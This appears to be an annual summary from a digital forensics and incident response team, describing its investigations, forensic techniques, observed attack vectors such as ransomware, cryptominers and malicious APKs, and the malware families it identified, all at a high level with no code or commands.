Overview of Activities
Throughout the year, the DFIR team and laboratory focused on incident investigations, malware
analysis, forensic examinations, and mitigation strategies for various cyber threats. Key activities
included:
1. Hard Drive and System Investigations: Analysis of damaged partitions, recovery of
potentially relevant artifacts, and detection of manipulated storage conditions.
2. Network Logs and Malicious Commands: Identification of encoded and decoded
malicious commands, tracing of command-and-control (C2) servers, and reverse shell
activities.
3. Mobile Forensics: Examination of malicious APK files, detection of Trojans and
vulnerabilities, and investigation of suspicious network activities.
4. Crypto Mining Investigations: Detection of unauthorized crypto mining operations on
recovered devices.
5. Malware Family Identification: Uncovering ransomware, Trojans, and viruses affecting
various platforms.
Techniques Implemented
The teams utilized an array of forensic and analytical techniques to uncover evidence and
mitigate risks, including:
● Image Acquisition and Disk Analysis: Recovery of data using imaging tools and analysis of
corrupted storage.
● Static and Dynamic Malware Analysis: Decompilation of APKs, Base64 decoding, and
reverse engineering of malicious binaries.
● System Log Analysis: Examination of system event logs to identify unauthorized access
and malicious activities (e.g., RDP session monitoring, logon/logoff events).
● Network Traffic Monitoring: Sniffing of malicious network connections and mapping IP
addresses associated with malware.
● Artifact Recovery: Extraction of deleted files, including critical artifacts like ransom notes
and malware executables.
● Command Decoding: Reverse engineering encoded commands from network logs to
unveil attacker objectives.
Cyber Attack Vectors Identified
The investigations revealed the following common attack vectors:
1. Remote Code Execution (RCE): Exploited through encoded commands within web server
logs (e.g., Nginx).
2. Ransomware Deployment: Identified through LockBit ransomware activities, leaving
ransom notes and encrypted data.
3. Crypto Mining Malware: Exploitation of system resources for unauthorized cryptocurrency
mining.
4. Trojan Horses: Deployment of disguised malicious software to exfiltrate sensitive data or
gain remote access.
5. Social Engineering: Utilization of malicious APKs mimicking legitimate applications to gain
device access.
6. Supply Chain Attacks: Infected updates and compromised software installations identified
in some systems.
Malware Types and Families Identified
1. LockBit Ransomware: Known for encrypting files and leaving non-decryptable ransom
demands.
2. Win32/Neshta.A: File-infecting virus targeting executables.
3. Trojan Families:
○ Trojan/Canesspy: Found in malicious APKs targeting Android users.
○ Trojan/Jadaneck: JavaScript-based Trojans for browser session hijacking and data
theft.
○ Trojan/Wacatac.H!ml: Facilitating remote access and additional malware
downloads.
4. Mobile Trojans: Exploited APKs to exfiltrate data.
5. Custom Malware: Binary used for reverse shells and system control.
Key Findings
● Attackers leveraged outdated system configurations and weak access controls.
● Malicious files frequently disguised as legitimate executables.
● Several instances of crypto mining operations were detected and linked to compromised
system files.
● APKs requesting excessive permissions contributed to significant data breaches.
Conclusion
The DFIR teams successfully identified and mitigated a range of cyber threats. By deploying
advanced forensic techniques and maintaining vigilance over emerging attack vectors, they
safeguarded critical systems and provided actionable recommendations to strengthen cyber
defenses moving forward.